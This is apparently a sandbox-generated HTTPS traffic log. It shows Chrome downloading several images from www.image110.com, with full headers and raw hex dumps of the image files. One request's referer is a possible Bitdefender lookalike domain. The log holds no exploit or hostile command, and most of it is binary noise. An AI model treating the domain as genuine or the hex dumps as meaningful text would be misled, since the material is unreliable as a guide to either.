                                                                                                                                                          2024-06-09 22:40:40 UTC16037INData Raw: ff d8 ff e1 1a d0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 31 3a 31 38 20 32 30 3a 31 37 3a 32 31 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 4e a0 03 00 04 00 00 00 01 00 00 00 51 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00
                                                                                                                                                          Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2022:11:18 20:17:21NQ
                                                                                                                                                          2024-06-09 22:40:40 UTC16384INData Raw: 00 00 00 38 42 49 4d 52 6f 6c 6c 00 00 00 08 00 00 00 00 00 00 00 00 38 42 49 4d 0f a1 00 00 00 00 00 1c 6d 66 72 69 00 00 00 02 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 38 42 49 4d 04 06 00 00 00 00 00 07 00 07 00 00 00 01 01 00 ff e1 15 ac 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f
                                                                                                                                                          Data Ascii: 8BIMRoll8BIMmfri8BIMhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/
                                                                                                                                                          2024-06-09 22:40:40 UTC13368INData Raw: 1f 0d cb f9 e3 f1 09 87 a6 38 de 6a c7 f0 9a f8 7d 3a 7a 39 a7 c0 30 f8 aa 99 73 a6 67 2d 85 62 99 b7 cb ad 8a 78 64 a4 cb 54 33 4b 2f e9 a1 78 66 9c 98 94 89 a3 b0 41 f5 59 be 96 57 85 bd de 53 e8 43 4a 1d f5 cc 98 96 9b f1 21 99 04 10 a7 d6 00 c0 85 25 3e 23 e1 34 e6 40 da 9b 25 e0 31 18 27 cc f1 f4 a3 83 eb 4f d0 17 a7 be a8 67 01 e9 8f d4 ef ab 5c 3f a4 5d 74 e9 2b 43 94 fd 34 7a e9 eb ae 63 cb b8 c5 57 51 f0 79 28 a9 b1 1a 9c b1 d4 2a 6a 1c 43 e6 70 9c 53 0b aa ad 23 0c aa ac 78 de 6a 27 03 cb 91 a1 65 11 e7 65 9d a1 e6 b9 53 07 31 ca ec 0b b6 6f f8 9f b4 69 0b 4a 58 5c 94 87 6d 89 4e 95 a1 c4 a7 f6 a8 40 21 2e 02 64 05 03 4a f3 06 90 e9 08 71 5e 24 ec 51 da 47 42 ba c7 03 d1 55 61 d3 3f 45 d4 7e 88 aa bd 4a 67 ee ae fa e0 ac e8 27 ac cf 4f 13 1c a3
                                                                                                                                                          Data Ascii: 8j}:z90sg-bxdT3K/xfAYWSCJ!%>#4@%1'Og\?]t+C4zcWQy(*jCpS#xj'eeS1oiJX\mN@!.dJq^$QGBUa?E~Jg'O


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          61192.168.2.549784103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:40 UTC384OUTGET /uploads/d37314d9711f2230688aca13698b9e6f.png HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:40 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:40 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 13472
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:40 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfb4-34a0"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:40 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:40 UTC13472INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 4e 00 00 00 51 08 02 00 00 00 32 c6 d8 c4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                          Data Ascii: PNGIHDRNQ2pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          62192.168.2.549785103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:40 UTC384OUTGET /uploads/6efc250fa2d2248025dd908007f87d44.png HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:40 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:40 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 10381
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:00 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf50-288d"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:40 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:40 UTC10381INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 4e 00 00 00 51 08 02 00 00 00 32 c6 d8 c4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                          Data Ascii: PNGIHDRNQ2pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          63192.168.2.549788103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:40 UTC384OUTGET /uploads/27eeee660ef8e616ea1edc3bb1bad1ca.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:41 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:40 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 39179
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:18 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf62-990b"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:40 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:41 UTC16037INData Raw: ff d8 ff e1 0e 78 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 31 3a 31 38 20 32 33 3a 35 38 3a 35 35 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 4e a0 03 00 04 00 00 00 01 00 00 00 51 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00
                                                                                                                                                          Data Ascii: xExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2022:11:18 23:58:55NQ
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36
                                                                                                                                                          Data Ascii: XYZ o8XYZ bXYZ $descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966
                                                                                                                                                          2024-06-09 22:40:42 UTC6758INData Raw: 0d 57 87 e4 6a 0a fa f4 96 08 30 aa ed cf 2d 24 42 d4 d2 12 14 a9 51 ea f5 02 2b f8 b2 f4 f3 35 60 fd 39 c7 fa 3d d0 7c d9 d4 bc 03 ab f9 b3 0f e9 7f 4a f3 2d 7e 60 e9 76 58 a3 cc 1f 39 8e e3 38 4a d4 c1 4f 98 73 5d 3e 27 4b f3 89 96 71 5f e5 51 e2 14 34 bf 39 51 4e 29 43 45 24 97 5f 57 a8 58 f4 df eb ca 7f 54 18 c6 63 a1 c8 5d 05 c5 b0 aa 6c b3 fe 6e 33 ad 65 1e 65 cc 99 39 f1 83 90 ba 9f 81 4f 88 e1 78 d3 d2 60 b8 8e 21 15 35 5c 32 d3 34 d5 38 5d 55 4c 33 8c 3c a5 54 66 59 e4 8e 89 fd 5e a7 6c 9b f8 82 74 1f 3b 75 17 2d 74 df 08 ea af 4c ab b1 0c c1 98 71 4c a9 4d 8b e0 7d 5c c8 98 9c 35 f4 21 61 5c 11 f0 aa 4a 2a b7 c4 6a f1 0c 4e 6a e8 20 f9 17 a4 85 62 92 2a c1 e7 c8 b1 d1 36 21 ea f5 0d d9 53 d5 4f 41 73 8f f5 96 6c 33 3d ff 00 2a c2 72 c6 13 59 d4
                                                                                                                                                          Data Ascii: Wj0-$BQ+5`9=|J-~`vX98JOs]>'Kq_Q49QN)CE$_WXTc]ln3ee9Ox`!5\248]UL3<TfY^lt;u-tLqLM}\5!a\J*jNj b*6!SOAsl3=*rY


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          64192.168.2.549789103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:40 UTC627OUTGET /uploads/f99c3fc30e9a9c1b3a5474816d8e5a69.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:41 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:41 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 296227
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:58 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfc6-48523"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:41 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:41 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 f6 c7 59 00 b2 ff d5 6b 2e ff fa 64 58 0b 07 eb 6d 2d ed 17 17 a4 a8 12 f8 b3 2d f0 93 2d db 18 1a ff f5 5a ff d5 28 d2 52 27 ff f3 7a ab 14 09 e7 55 29 ba 1b 10 fc c8 68 ae 9d 9e fc e3 3a fa a7 ac de 2c 20 ff 26 6d 1d 29 a7 ff 65 01 ff d8 49 d5 28 1c f3 bc 53 fe dc 55 d2 6b 0b fc a4 d6 00 db 6c ff 00 b6 b7 29 11 f4 8c 0b cd 23 18 fc d2 d4 72 d4 0b 13 12 d0 ff db 32 00 86 ff f7 2c 30 f5 71 42 e3 20 22 ff a3 00 ff 65 d1 ff e4 41 00 ff 04 cb 4d 17 11 01 fb fb ef f0 fc 70 8f ff ef 73 ec 28 2b ff c7 01 f5 30 33 9f da f8 f3 20 22 ff ce 34 00 99 ff e8 9a 45 67 d0 fd f7 78 79 fe a2 9e c4 20 14 00 7c ff ff eb 4b ff cf 20 fb 30 33 fb dd 6b 00 d4 a4 fb e4 72 6f 61 d2 ff ed 6c b3 17 0c 73 6c 9a fc c9 49 f7 28 2b ff ef 52 f9 a7
                                                                                                                                                          Data Ascii: GIF89adYk.dXm---Z(R'zU)h:, &m)eI(SUkl)#r2,0qB "eAMps(+03 "4Egxy |K 03kroalslI(+R
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: 07 32 e4 a6 29 ec 02 ac d8 26 18 cc 83 93 02 e5 05 ea 81 93 82 c1 a0 d1 82 1e 44 c3 2e e4 a6 27 36 5d 2a e0 81 93 2a 81 29 ac 22 2d a4 02 37 40 27 79 b2 67 7a ba 29 9c be a9 9c c6 29 9d ce a9 9d d6 29 9e de a9 9e e6 29 9f ee a9 9f 36 9d e3 25 c2 47 0d 2a a1 7a 94 54 68 94 34 ba 04 7d 8e 94 4d fc a7 a3 ea 67 7c d2 84 58 be e7 f0 09 28 84 7e 4d eb 59 45 15 ac a5 89 46 21 83 9e a3 ef 55 21 53 89 63 82 92 89 52 65 85 1c 98 45 15 80 09 85 26 a1 cf 80 e8 61 36 a1 a6 26 55 0b fc e3 19 aa 61 d2 cc 1e 16 89 61 5e 92 5b 14 99 23 41 4e e8 62 0a 85 f2 ad 46 43 a6 28 6b 1c 6b c4 f1 d5 8c d2 28 b3 0a 46 8d 26 e2 fa 75 86 49 72 45 15 6c 46 b5 fe 68 8e 72 d9 b6 06 69 91 fa c3 76 12 27 32 60 9d 30 ea c1 2b 3c e9 93 86 02 b9 02 cb 2c 3c a9 12 f0 24 2d 68 22 00 3c a9 70 36
                                                                                                                                                          Data Ascii: 2)&D.'6]**)"-7@'ygz))))6%G*zTh4}Mg|X(~MYEF!U!ScReE&a6&Uaa^[#ANbFC(kk(F&uIrElFhriv'2`0+<,<$-h"<p6
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: 93 56 da 38 e5 4b 71 5a 89 63 95 3b 72 b9 21 88 2f 91 59 25 68 26 ba 29 e8 a0 84 16 6a 28 4f 70 d6 19 e3 9c ff 28 1a e5 9d 1c 36 96 0d 6e 79 da 78 d3 7f 40 16 e7 28 6b 80 1e ea e9 a7 cc f1 81 19 1f 2d dc 90 46 53 14 b8 a9 01 2f 5a 25 ba a9 78 8c 42 ff e8 6a 83 b2 d6 fa 20 a4 b3 c9 f4 5f a5 dd 31 06 e7 4d 47 30 d8 e7 ab 9d 82 6a ec b1 98 65 e0 4f 06 23 c8 71 43 61 2d 0c 54 45 06 a2 26 25 81 0b 12 e4 e4 c2 b6 db b2 fa 13 19 de 3a 45 c6 30 39 51 20 01 10 64 b8 10 2e 4f 2e a8 e3 ae 3a 37 91 e1 ae 0b 64 00 61 d5 79 e7 4d 4a 20 be e7 e5 94 65 87 94 55 a7 2b a5 5b 92 28 22 6e 37 0d f8 9e a6 9b 16 8b ec c3 10 fb 65 d0 08 76 11 f4 ec 4c d1 5a ac 14 10 f3 6a 70 d3 bb ee 66 fb 53 22 2e 3c a5 81 3a 89 00 91 6a 4d 89 80 ac 8e bd 3e b5 fb ee 4d 32 cf 8b 56 a2 8c 52 f6
                                                                                                                                                          Data Ascii: V8KqZc;r!/Y%h&)j(Op(6nyx@(k-FS/Z%xBj _1MG0jeO#qCa-TE&%:E09Q d.O.:7dayMJ eU+[("n7evLZjpfS".<:jM>M2VR
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: 0a d1 f5 9b 5d 3d 44 39 ab 18 b8 22 1e b1 72 af 93 e7 61 a5 95 cf 66 55 ae 42 00 ed ac 5e 2a 37 7e 58 94 65 8d f3 02 2e 03 a5 69 bb 66 1c a0 8f 9b 19 e9 bf 88 6b bd b4 83 a0 7d c0 ab e9 d7 81 ba 30 8a ba d4 42 d5 eb c7 4e eb c4 a6 93 1a 67 3e ec 08 94 e2 a5 d3 8f ff 30 8d 1f 22 e0 ef fb fe c3 0f bf 26 f8 ff da c4 4c 24 57 21 a4 7b 51 2d d2 e0 74 2d c4 d4 ba b9 e0 ef 0c b6 b0 e3 73 6a 69 de d9 28 d7 09 eb 46 f3 57 68 e2 ea 99 3d cf 4e 59 fd 78 4b 68 44 af 09 db f6 d1 f6 5c 76 d6 6d 37 7d 7b c7 e1 6e a0 b6 68 27 a7 08 9e 5b c9 9b 6e 0b 94 0d 36 6e 42 41 56 d4 25 fa 9a 42 de ab 10 3a 6e e8 30 f9 6e 9e 3a 15 d2 ef 7f 04 c1 0f 52 0f 82 c0 17 32 f5 a9 4f 5c eb 9f 3a 38 90 1a a2 01 84 ac 36 e1 36 72 f8 c3 d5 01 e1 35 fb 7a eb d2 ab b8 c5 eb 3c d1 e5 31 74 66 2a
                                                                                                                                                          Data Ascii: ]=D9"rafUB^*7~Xe.ifk}0BNg>0"&L$W!{Q-t-sji(FWh=NYxKhD\vm7}{nh'[n6nBAV%B:n0n:R2O\:866r5z<1tf*
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: d5 8d 9a f7 81 4e 7a ae ea 6b 6d 87 b6 21 76 e9 6e 1b ec 82 10 ac 77 f9 a8 f0 0d 6b 6d e5 a1 6f 34 2b b4 00 2b 98 5d bc 17 c6 b4 b0 c3 4f 14 5d 20 c0 c5 37 cc e2 4e 25 26 fc 1f 16 05 b3 95 29 3b 37 46 08 c9 e0 ab 80 8d 7e d0 27 0f c9 55 d1 90 d2 71 78 d6 ac e6 46 46 5a 8c 07 c0 a5 b2 5c 09 ab 66 36 33 1d eb 1c f8 40 08 46 f0 81 40 2b 48 1a 8c 76 10 a1 a5 a9 78 b7 cb 56 ee 9a 86 ff 1e f5 f8 0e 84 8f 9b 53 b9 36 88 b4 e3 31 24 79 5c e3 57 d8 fe a1 01 b1 f1 e7 6c 68 93 9e be aa b7 3c 7f 35 68 18 37 94 c0 d7 12 86 30 85 f9 e6 7b e0 2b 88 a8 24 71 44 24 1e 11 7d fc 08 5c 62 4e a5 3e 22 b6 6f 70 8b 29 4d 27 64 54 10 fa 85 64 14 56 0c 19 e8 8e 74 92 7a 50 a6 29 84 91 1f 41 60 85 b8 7c d4 03 3e 62 d8 cc 69 04 f7 10 dc 0c a4 58 37 93 60 1d ed 78 47 3c 56 89 82 05
                                                                                                                                                          Data Ascii: Nzkm!vnwkmo4++]O] 7N%&);7F~'UqxFFZ\f63@F@+HvxVS61$y\Wlh<5h70{+$qD$}\bN>"op)M'dTdVtzP)A`|>biX7`xG<V
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: 0d 4a 1f 11 16 61 ed 61 9f 10 ea e0 a4 19 21 13 12 ff 21 10 d2 e0 10 f8 9e 21 68 80 0c 6e 4d cc a1 c2 0b a0 02 14 dc dc ef c5 e0 0b 8c 9f ef d1 e0 0d 52 da 15 26 a1 19 d2 60 23 48 5f 2d 9c 21 1b 26 e1 fe 69 dd ad e5 5f 61 75 60 ff 01 41 fd 0d 60 01 06 a0 2d 48 a0 8c d8 c2 02 da 02 b9 69 1b d7 d9 40 fd f1 61 4d 40 cc 28 fc 02 bb 0c c2 01 28 de c5 34 5d 91 81 82 1f 76 60 21 72 19 e5 c1 5d 56 00 1e 26 e2 5b 96 a4 82 5c 78 a2 27 ba a0 28 e6 c5 16 8c e2 6e 2d 41 2a b4 61 12 8e e1 ed 05 a1 1b 20 5f 1a 16 9f 35 e4 60 16 aa 22 0d 36 21 2e 1a 9f b0 dc 57 f6 9d 61 16 9a 83 21 70 61 2e 0e 63 2b ea 20 a5 71 21 f6 99 43 13 b8 c1 32 36 81 32 3e a3 33 0e 07 33 4e a3 1b 7c 9f 75 c9 e0 2b 86 e1 0c 16 5a ef 41 41 2d da a2 10 d2 41 11 d2 01 38 96 a3 13 10 22 3a 9e a3 3a 3a
                                                                                                                                                          Data Ascii: Jaa!!!hnMR&`#H_-!&i_au`A`-Hi@aM@((4]v`!r]V&[\x'(n-A*a _5`"6!.Wa!pa.c+ q!C262>33N|u+ZAA-A8":::
                                                                                                                                                          2024-06-09 22:40:41 UTC16384INData Raw: 1d 38 20 40 b1 80 7f 97 a9 1e 60 6c 55 ab e0 8a e8 36 5b ae 27 e5 96 94 94 96 fd a2 c3 21 a5 de bf 4e 52 fc 72 6e 7c d1 31 e8 e4 b1 5f 5b 64 c7 ee 22 2d e6 d2 a7 ab 7c 40 cb 3a f6 eb da b3 73 df ee bd 3b f8 ef e2 c3 93 1f 6f be 3c fa f3 ea d3 b3 5f ef be 7d f7 7f 4f a6 2d 68 99 d1 25 fd fb fa a7 4d 38 56 f0 3f 80 04 51 34 41 12 b9 14 78 20 13 49 f8 67 d0 7f 27 e0 82 60 12 07 1e 68 20 85 10 e6 72 df 34 f3 2d 30 95 7c 15 05 08 60 48 1b ba f4 84 4b 1c 79 f4 61 88 24 5a b4 21 50 1f 12 74 a1 48 1a 72 d8 94 8b 05 15 42 62 86 f4 65 f8 cf 02 2d d6 18 0f 4a d4 5d 24 22 7d 30 fd 78 a4 8b 3c 01 e8 e3 92 ff 25 41 d2 92 f2 d5 a7 61 87 f5 c9 97 df 54 53 5a 44 65 96 26 1e c9 93 4b 17 71 c9 ff e3 8e 15 8d 69 25 9a 2d d9 57 95 0a 6f b9 89 c3 9b 6e c2 a2 17 9d 8a 90 23 e4
                                                                                                                                                          Data Ascii: 8 @`lU6['!NRrn|1_[d"-|@:s;o<_}O-h%M8V?Q4Ax Ig'`h r4-0|`HKya$Z!PtHrBbe-J]$"}0x<%AaTSZDe&Kqi%-Won#
